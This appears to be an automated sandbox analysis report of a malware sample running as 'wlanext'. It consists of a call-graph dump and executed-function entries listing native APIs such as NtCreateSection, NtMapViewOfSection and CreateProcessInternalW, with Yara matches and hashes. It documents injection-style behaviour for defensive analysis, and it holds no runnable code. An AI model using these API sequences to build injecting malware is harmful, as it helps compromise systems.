79473->79472 79475 9bb7d 79474->79475 79476 9bb94 79474->79476 79475->79476 79477 9bf70 2 API calls 79475->79477 79476->79453 79478 9bbab 79477->79478 79478->79453 79479->79443 79480->79430 79482 9af40 LdrLoadDll 79481->79482 79483 9a62c RtlAllocateHeap 79482->79483 79483->79470 79485 94081 79484->79485 79486 94089 79484->79486 79485->79377 79515 9435c 79486->79515 79611 9cf10 79486->79611 79488 940dd 79489 9cf10 2 API calls 79488->79489 79493 940e8 79489->79493 79490 94136 79492 9cf10 2 API calls 79490->79492 79494 9414a 79492->79494 79493->79490 79495 9d040 3 API calls 79493->79495 79625 9cfb0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 79493->79625 79496 941a7 79494->79496 79616 9d040 79494->79616 79495->79493 79497 9cf10 2 API calls 79496->79497 79499 941bd 79497->79499 79500 941fa 79499->79500 79502 9d040 3 API calls 79499->79502 79501 9cf10 2 API calls 79500->79501 79503 94205 79501->79503 79502->79499 79504 9d040 3 API calls 79503->79504 79510 9423f 79503->79510 79504->79503 79507 9cf70 2 API calls 79508 9433e 79507->79508 79509 9cf70 2 API calls 79508->79509 79511 94348 79509->79511 79622 9cf70 79510->79622 79512 9cf70 2 API calls 79511->79512 79513 94352 79512->79513 79514 9cf70 2 API calls 79513->79514 79514->79515 79515->79377 79517 953a1 79516->79517 79518 94a50 8 API calls 79517->79518 79520 953b7 79518->79520 79519 9540a 79519->79381 79520->79519 79521 953f2 79520->79521 79522 95405 79520->79522 79523 9bda0 2 API calls 79521->79523 79524 9bda0 2 API calls 79522->79524 79525 953f7 79523->79525 79524->79519 79525->79381 79626 9ac10 79526->79626 79529 9ac10 LdrLoadDll 79530 9ad6d 79529->79530 79531 9ac10 LdrLoadDll 79530->79531 79532 9ad76 79531->79532 79533 9ac10 LdrLoadDll 79532->79533 79534 9ad7f 79533->79534 79535 9ac10 LdrLoadDll 79534->79535 79536 9ad88 79535->79536 79537 9ac10 LdrLoadDll 79536->79537 79538 9ad91 79537->79538 79539 9ac10 LdrLoadDll 79538->79539 79540 9ad9d 79539->79540 79541 9ac10 LdrLoadDll 79540->79541 79542 9ada6 79541->79542 79543 9ac10 LdrLoadDll 79542->79543 79544 9adaf 79543->79544 79545 9ac10 LdrLoadDll 79544->79545 79546 9adb8 79545->79546 79547 9ac10 LdrLoadDll 79546->79547 79548 9adc1 79547->79548 79549 9ac10 LdrLoadDll 79548->79549 79550 9adca 79549->79550 79551 9ac10 LdrLoadDll 79550->79551 79552 9add6 79551->79552 79553 9ac10 LdrLoadDll 79552->79553 79554 9addf 79553->79554 79555 9ac10 LdrLoadDll 79554->79555 79556 9ade8 79555->79556 79557 9ac10 LdrLoadDll 79556->79557 79558 9adf1 79557->79558 79559 9ac10 LdrLoadDll 79558->79559 79560 9adfa 79559->79560 79561 9ac10 LdrLoadDll 79560->79561 79562 9ae03 79561->79562 79563 9ac10 LdrLoadDll 79562->79563 79564 9ae0f 79563->79564 79565 9ac10 LdrLoadDll 79564->79565 79566 9ae18 79565->79566 79567 9ac10 LdrLoadDll 79566->79567 79568 9ae21 79567->79568 79569 9ac10 LdrLoadDll 79568->79569 79570 9ae2a 79569->79570 79571 9ac10 LdrLoadDll 79570->79571 79572 9ae33 79571->79572 79573 9ac10 LdrLoadDll 79572->79573 79574 9ae3c 79573->79574 79575 9ac10 LdrLoadDll 79574->79575 79576 9ae48 79575->79576 79577 9ac10 LdrLoadDll 79576->79577 79578 9ae51 79577->79578 79579 9ac10 LdrLoadDll 79578->79579 79580 9ae5a 79579->79580 79581 9ac10 LdrLoadDll 79580->79581 79582 9ae63 79581->79582 79583 9ac10 LdrLoadDll 79582->79583 79584 9ae6c 79583->79584 79585 9ac10 LdrLoadDll 79584->79585 79586 9ae75 79585->79586 79587 9ac10 LdrLoadDll 79586->79587 79588 9ae81 79587->79588 79589 9ac10 LdrLoadDll 79588->79589 79590 9ae8a 79589->79590 79591 9ac10 LdrLoadDll 79590->79591 79592 9ae93 79591->79592 79593 9ac10 LdrLoadDll 79592->79593 79594 9ae9c 79593->79594 79595 9ac10 LdrLoadDll 79594->79595 79596 9aea5 79595->79596 79597 9ac10 LdrLoadDll 79596->79597 79598 9aeae 79597->79598 79599 9ac10 LdrLoadDll 79598->79599 79600 9aeba 79599->79600 79601 9ac10 LdrLoadDll 79600->79601 79602 9aec3 79601->79602 79603 9ac10 LdrLoadDll 79602->79603 79604 9aecc 79603->79604 79604->79385 79606 9af40 LdrLoadDll 79605->79606 79607 99ebc 79606->79607 79632 203fdc0 LdrInitializeThunk 79607->79632 79608 99ed3 79608->79316 79610->79383 79612 9cf20 79611->79612 79613 9cf26 79611->79613 79612->79488 79614 9bf70 2 API calls 79613->79614 79615 9cf4c 79614->79615 79615->79488 79617 9cfb0 79616->79617 79618 9bf70 2 API calls 79617->79618 79620 9d00d 79617->79620 79619 9cfea 79618->79619 79621 9bda0 2 API calls 79619->79621 79620->79494 79621->79620 79623 94334 79622->79623 79624 9bda0 2 API calls 79622->79624 79623->79507 79624->79623 79625->79493 79627 9ac2b 79626->79627 79628 94e50 LdrLoadDll 79627->79628 79629 9ac4b 79628->79629 79630 94e50 LdrLoadDll 79629->79630 79631 9acf7 79629->79631 79630->79631 79631->79529 79632->79608 79633->79391 79635 9a66c RtlFreeHeap 79634->79635 79636 9af40 LdrLoadDll 79634->79636 79635->79395 79636->79635 79638 87eab 79637->79638 79639 87eb0 79637->79639 79638->79324 79640 9bd20 2 API calls 79639->79640 79643 87ed5 79640->79643 79641 87f38 79641->79324 79642 99ea0 2 API calls 79642->79643 79643->79641 79643->79642 79644 87f3e 79643->79644 79648 9bd20 2 API calls 79643->79648 79653 9a5a0 79643->79653 79646 87f64 79644->79646 79647 9a5a0 2 API calls 79644->79647 79646->79324 79649 87f55 79647->79649 79648->79643 79649->79324 79651 8817e 79650->79651 79652 9a5a0 2 API calls 79650->79652 79651->79281 79652->79651 79654 9a5bc 79653->79654 79655 9af40 LdrLoadDll 79653->79655 79658 203fb68 LdrInitializeThunk 79654->79658 79655->79654 79656 9a5d3 79656->79643 79658->79656 79660 9b5a3 79659->79660 79661 8acf0 LdrLoadDll 79660->79661 79662 89c5b 79661->79662 79662->79289 79665 8b063 79663->79665 79664 8b0e0 79664->79294 79665->79664 79678 99c70 LdrLoadDll 79665->79678 79668 9af40 LdrLoadDll 79667->79668 79669 8f1bb 79668->79669 79669->79297 79670 9a7b0 79669->79670 79671 9a7cf LookupPrivilegeValueW 79670->79671 79672 9af40 LdrLoadDll 79670->79672 79671->79299 79672->79671 79674 9af40 LdrLoadDll 79673->79674 79675 9a25c 79674->79675 79679 203fed0 LdrInitializeThunk 79675->79679 79676 9a27b 79676->79300 79678->79664 79679->79676 79681 8b1f0 79680->79681 79682 8b040 LdrLoadDll 79681->79682 79683 8b204 79682->79683 79683->79236 79685 8af34 79684->79685 79757 99c70 LdrLoadDll 79685->79757 79687 8af6e 79687->79238 79689 8f3ac 79688->79689 79690 8b1c0 LdrLoadDll 79689->79690 79691 8f3be 79690->79691 79758 8f290 79691->79758 79694 8f3d9 79697 8f3e4 79694->79697 79698 9a470 2 API calls 79694->79698 79695 8f3f1 79696 8f402 79695->79696 79699 9a470 2 API calls 79695->79699 79696->79241 79697->79241 79698->79697 79699->79696 79701 8f43c 79700->79701 79777 8b2b0 79701->79777 79703 8f44e 79704 8f290 3 API calls 79703->79704 79705 8f45f 79704->79705 79706 8f469 79705->79706 79707 8f481 79705->79707 79709 8f474 79706->79709 79710 9a470 2 API calls 79706->79710 79708 8f492 79707->79708 79711 9a470 2 API calls 79707->79711 79708->79243 79709->79243 79710->79709 79711->79708 79713 8caa6 79712->79713 79714 8cab0 79712->79714 79713->79252 79715 8af10 LdrLoadDll 79714->79715 79716 8cb4e 79715->79716 79717 8cb74 79716->79717 79718 8b040 LdrLoadDll 79716->79718 79717->79252 79719 8cb90 79718->79719 79720 94a50 8 API calls 79719->79720 79721 8cbe5 79720->79721 79721->79252 79723 8d646 79722->79723 79724 8b040 LdrLoadDll 79723->79724 79725 8d65a 79724->79725 79781 8d310 79725->79781 79727 8908b 79728 8cc00 79727->79728 79729 8cc26 79728->79729 79730 8b040 LdrLoadDll 79729->79730 79731 8cca9 79729->79731 79730->79731 79732 8b040 LdrLoadDll 79731->79732 79733 8cd16 79732->79733 79734 8af10 LdrLoadDll 79733->79734 79735 8cd7f 79734->79735 79736 8b040 LdrLoadDll 79735->79736 79737 8ce2f 79736->79737 79737->79265 79741 88d14 79738->79741 79810 8f6d0 79738->79810 79740 88f25 79740->79221 79741->79740 79815 943a0 79741->79815 79743 88d70 79743->79740 79818 88ab0 79743->79818 79746 9cf10 2 API calls 79747 88db2 79746->79747 79748 9d040 3 API calls 79747->79748 79752 88dc7 79748->79752 79749 87ea0 4 API calls 79749->79752 79752->79740 79752->79749 79753 88160 2 API calls 79752->79753 79754 8c7b0 18 API calls 79752->79754 79823 8f670 79752->79823 79827 8f080 21 API calls 79752->79827 79753->79752 79754->79752 79755->79244 79756->79262 79757->79687 79759 8f2aa 79758->79759 79767 8f360 79758->79767 79760 8b040 LdrLoadDll 79759->79760 79761 8f2cc 79760->79761 79768 99f20 79761->79768 79763 8f30e 79771 99f60 79763->79771 79766 9a470 2 API calls 79766->79767 79767->79694 79767->79695 79769 9af40 LdrLoadDll 79768->79769 79770 99f3c 79768->79770 79769->79770 79770->79763 79772 99f7c 79771->79772 79773 9af40 LdrLoadDll 79771->79773 79776 20407ac LdrInitializeThunk 79772->79776 79773->79772 79774 8f354 79774->79766 79776->79774 79778 8b2d7 79777->79778 79779 8b040 LdrLoadDll 79778->79779 79780 8b313 79779->79780 79780->79703 79782 8d327 79781->79782 79790 8f710 79782->79790 79786 8d39b 79787 8d3a2 79786->79787 79801 9a280 LdrLoadDll 79786->79801 79787->79727 79789 8d3b5 79789->79727 79791 8f735 79790->79791 79802 881a0 79791->79802 79793 8d36f 79798 9a6c0 79793->79798 79794 94a50 8 API calls 79796 8f759 79794->79796 79796->79793 79796->79794 79797 9bda0 2 API calls 79796->79797 79809 8f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 79796->79809 79797->79796 79799 9af40 LdrLoadDll 79798->79799 79800 9a6df CreateProcessInternalW 79799->79800 79800->79786 79801->79789 79803 8829f 79802->79803 79804 881b5 79802->79804 79803->79796 79804->79803 79805 94a50 8 API calls 79804->79805 79806 88222 79805->79806 79807 9bda0 2 API calls 79806->79807 79808 88249 79806->79808 79807->79808 79808->79796 79809->79796 79811 94e50 LdrLoadDll 79810->79811 79812 8f6ef 79811->79812 79813 8f6fd 79812->79813 79814 8f6f6 SetErrorMode 79812->79814 79813->79741 79814->79813 79817 943c6 79815->79817 79828 8f4a0 79815->79828 79817->79743 79819 9bd20 2 API calls 79818->79819 79822 88ad5 79819->79822 79820 88cea 79820->79746 79822->79820 79847 99860 79822->79847 79824 8f683 79823->79824 79895 99e70 79824->79895 79827->79752 79829 8f4bd 79828->79829 79835 99fa0 79829->79835 79832 8f505 79832->79817 79836 9af40 LdrLoadDll 79835->79836 79837 99fbc 79836->79837 79845 203ffb4 LdrInitializeThunk 79837->79845 79838 8f4fe 79838->79832 79840 99ff0 79838->79840 79841 9a00c 79840->79841 79842 9af40 LdrLoadDll 79840->79842 79846 203fc60 LdrInitializeThunk 79841->79846 79842->79841 79843 8f52e 79843->79817 79845->79838 79846->79843 79848 9bf70 2 API calls 79847->79848 79849 99877 79848->79849 79868 89310 79849->79868 79851 99892 79852 998b9 79851->79852 79853 998d0 79851->79853 79854 9bda0 2 API calls 79852->79854 79856 9bd20 2 API calls 79853->79856 79855 998c6 79854->79855 79855->79820 79857 9990a 79856->79857 79858 9bd20 2 API calls 79857->79858 79859 99923 79858->79859 79865 99bc4 79859->79865 79874 9bd60 LdrLoadDll 79859->79874 79861 99ba9 79862 99bb0 79861->79862 79861->79865 79863 9bda0 2 API calls 79862->79863 79864 99bba 79863->79864 79864->79820 79866 9bda0 2 API calls 79865->79866 79867 99c19 79866->79867 79867->79820 79869 89335 79868->79869 79870 8acf0 LdrLoadDll 79869->79870 79871 89368 79870->79871 79873 8938d 79871->79873 79875 8cf20 79871->79875 79873->79851 79874->79861 79876 8cf4c 79875->79876 79877 9a1c0 LdrLoadDll 79876->79877 79878 8cf65 79877->79878 79879 8cf6c 79878->79879 79886 9a200 79878->79886 79879->79873 79883 8cfa7 79884 9a470 2 API calls 79883->79884 79885 8cfca 79884->79885 79885->79873 79887 9a21c 79886->79887 79888 9af40 LdrLoadDll 79886->79888 79894 203fbb8 LdrInitializeThunk 79887->79894 79888->79887 79889 8cf8f 79889->79879 79891 9a7f0 79889->79891 79892 9a80f 79891->79892 79893 9af40 LdrLoadDll 79891->79893 79892->79883 79893->79892 79894->79889 79896 9af40 LdrLoadDll 79895->79896 79897 99e8c 79896->79897 79900 203fd8c LdrInitializeThunk 79897->79900 79898 8f6ae 79898->79752 79900->79898

                                                                                Executed Functions

                                                                                Function 00A4A036 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 481nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtQueryInformationProcess.NTDLL ref: 00A4A19F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923599822.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_a40000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InformationProcessQuery
                                                                                • String ID: 0
                                                                                • API String ID: 1778838933-4108050209
                                                                                • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                • Instruction ID: 0add6d2a31a3e9f28afd8c5eccbfe051a0001dbc4d4a6641453b091cd341f7d7
                                                                                • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                • Instruction Fuzzy Hash: 94F13274928A4C8FDBA9EF68C895AEEB7E0FF98304F40462AE44ED7251DF349541CB41
                                                                                Function 00A49BAF Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 207 a49baf-a49bfe call a49102 210 a49c00 207->210 211 a49c0c-a49c9a call a4b942 * 2 NtCreateSection 207->211 213 a49c02-a49c0a 210->213 217 a49ca0-a49d0a call a4b942 NtMapViewOfSection 211->217 218 a49d5a-a49d68 211->218 213->211 213->213 221 a49d52 217->221 222 a49d0c-a49d4c 217->222 221->218 224 a49d4e-a49d4f 222->224 225 a49d69-a49d6b 222->225 224->221 226 a49d6d-a49d72 225->226 227 a49d88-a49ddc call a4cd62 NtClose 225->227 228 a49d74-a49d86 call a49172 226->228 228->227
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923599822.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_a40000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Section$CloseCreateView
                                                                                • String ID: @$@
                                                                                • API String ID: 1133238012-149943524
                                                                                • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                                                • Instruction ID: 6c57070488d7e04a1f01835b988dac3b4ef648f4b6b7ba6fd328fdd8f22d3ef4
                                                                                • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                                                • Instruction Fuzzy Hash: E5619F7461CB088FCB58EF68D8856AABBE0FF98314F50062EE58AC3651DF35D441CB86
                                                                                Function 00A49BB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 266 a49bb2-a49bef 267 a49bf7-a49bfe 266->267 268 a49bf2 call a49102 266->268 269 a49c00 267->269 270 a49c0c-a49c9a call a4b942 * 2 NtCreateSection 267->270 268->267 272 a49c02-a49c0a 269->272 276 a49ca0-a49d0a call a4b942 NtMapViewOfSection 270->276 277 a49d5a-a49d68 270->277 272->270 272->272 280 a49d52 276->280 281 a49d0c-a49d4c 276->281 280->277 283 a49d4e-a49d4f 281->283 284 a49d69-a49d6b 281->284 283->280 285 a49d6d-a49d72 284->285 286 a49d88-a49ddc call a4cd62 NtClose 284->286 287 a49d74-a49d86 call a49172 285->287 287->286
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923599822.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_a40000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Section$CreateView
                                                                                • String ID: @$@
                                                                                • API String ID: 1585966358-149943524
                                                                                • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                • Instruction ID: f1d54b4e5b3b181150701f0a6127f327aa38ec6dd4df760203d6aa99267f9208
                                                                                • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                • Instruction Fuzzy Hash: FC517E70618B088FDB58DF58D8956ABBBE0FB98314F50062EF98AC3651DF35D441CB86
                                                                                Function 0009A392 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72filenativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 294 9a392-9a396 295 9a398-9a439 call 9af40 NtReadFile 294->295 296 9a350-9a354 294->296 297 9a35c-9a391 NtCreateFile 296->297 298 9a357 call 9af40 296->298 298->297
                                                                                APIs
                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00094BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0009A38D
                                                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 0009A435
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CreateRead
                                                                                • String ID: .z`$1J
                                                                                • API String ID: 3388366904-1222012080
                                                                                • Opcode ID: 8c54b2ab54814b5a95f95e51e3a3db47f28d6cb4cc196ba46914838d11b87391
                                                                                • Instruction ID: 94f3940aa2123c716a672b603d29bcdd4bd8d909f1d26d4b5b6a4698b39043ef
                                                                                • Opcode Fuzzy Hash: 8c54b2ab54814b5a95f95e51e3a3db47f28d6cb4cc196ba46914838d11b87391
                                                                                • Instruction Fuzzy Hash: 3F21F3B2204148AFCB08DF98DC91DEB77EAAF8D358B158248FA1DD7251D630EC11CBA0
                                                                                Function 00A4A042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtQueryInformationProcess.NTDLL ref: 00A4A19F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923599822.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_a40000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InformationProcessQuery
                                                                                • String ID: 0
                                                                                • API String ID: 1778838933-4108050209
                                                                                • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                • Instruction ID: 9e5cbf6c4c2cfc3bede1420d303a7f85ae094ef108348c03aefd773aa3861689
                                                                                • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                • Instruction Fuzzy Hash: 87512B74918A8C8FDBA9EF68C8946EEBBF4FB98304F40462ED44AD7251DF309645CB41
                                                                                Function 0009A340 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 560 9a340-9a391 call 9af40 NtCreateFile
                                                                                APIs
                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00094BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0009A38D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: .z`
                                                                                • API String ID: 823142352-1441809116
                                                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                • Instruction ID: 0c4abf70ec6ad5aeec8ea2fcbd2d95a1ec985d7ae469d323ea612ea60344f05c
                                                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                • Instruction Fuzzy Hash: C0F0BDB2200208ABCB08CF88DC95EEB77EDAF8C754F158248BA0D97241C630E8118BA4
                                                                                Function 0009A3EA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 563 9a3ea-9a406 564 9a40c-9a439 NtReadFile 563->564 565 9a407 call 9af40 563->565 565->564
                                                                                APIs
                                                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 0009A435
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID: 1J
                                                                                • API String ID: 2738559852-2845985182
                                                                                • Opcode ID: dcb9f5aa1df7a8cd51243e1eb72ffb8043a879b8cf83bb9b31d648a67041aa0d
                                                                                • Instruction ID: 6554e365bb75fbce8bcf0951321bb67bf838421ccc035af913d32266fb01b298
                                                                                • Opcode Fuzzy Hash: dcb9f5aa1df7a8cd51243e1eb72ffb8043a879b8cf83bb9b31d648a67041aa0d
                                                                                • Instruction Fuzzy Hash: 8FF0E2B6200208ABCB18DF88DC80EEB77A9AF8C354F158248BA1D97241C630E851CBA0
                                                                                Function 0009A3F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 566 9a3f0-9a406 567 9a40c-9a439 NtReadFile 566->567 568 9a407 call 9af40 566->568 568->567
                                                                                APIs
                                                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 0009A435
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID: 1J
                                                                                • API String ID: 2738559852-2845985182
                                                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                • Instruction ID: e6ef27d6ca281ebc2a40a49134fdca855c6b43a6ce6ff2ca2eff67590ba9a2e2
                                                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                • Instruction Fuzzy Hash: 4EF0A4B2200208ABCB14DF89DC95EEB77ADAF8C754F158258BA1D97251D630E8118BA0
                                                                                Function 0009A43A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 569 9a43a-9a43b 570 9a43d-9a469 call 9af40 569->570 571 9a423-9a439 NtReadFile 569->571
                                                                                APIs
                                                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 0009A435
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID: }K
                                                                                • API String ID: 2738559852-3375959163
                                                                                • Opcode ID: 7b42998f686dc38c68e2e06c340acd3835ab50e2df2089e8ce641c4ef18469f6
                                                                                • Instruction ID: bece616e186723e4cbaacbad8a82f97b529cea2136870b0588d4a9e981b896b9
                                                                                • Opcode Fuzzy Hash: 7b42998f686dc38c68e2e06c340acd3835ab50e2df2089e8ce641c4ef18469f6
                                                                                • Instruction Fuzzy Hash: AFF05E762042046BDB14EF94EC85EEB77ACEF88320F008559FE5C8B241C575E90087E0
                                                                                Function 0009A470 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtClose.NTDLL(PM,?,?,00094D50,00000000,FFFFFFFF), ref: 0009A495
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID: PM
                                                                                • API String ID: 3535843008-2952166990
                                                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                • Instruction ID: ada41b9c046a68f67638934593d96bca242b3ef569f3d93702ca4c74fe05ed8f
                                                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                • Instruction Fuzzy Hash: 3DD01776200214ABDB10EBD8CC89EE77BACEF48760F1544A9BA189B242C530FA0086E0
                                                                                Function 0009A520 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 0009A559
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                • Instruction ID: add2db225ce935dc2c80b6e7776892d2bfc28f4233b37265f6fa32001e4b845b
                                                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                • Instruction Fuzzy Hash: F9F015B2200208ABCB14DF89CC81EEB77ADAF8C754F118158BE0897241C630F810CBE0
                                                                                Function 020400C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
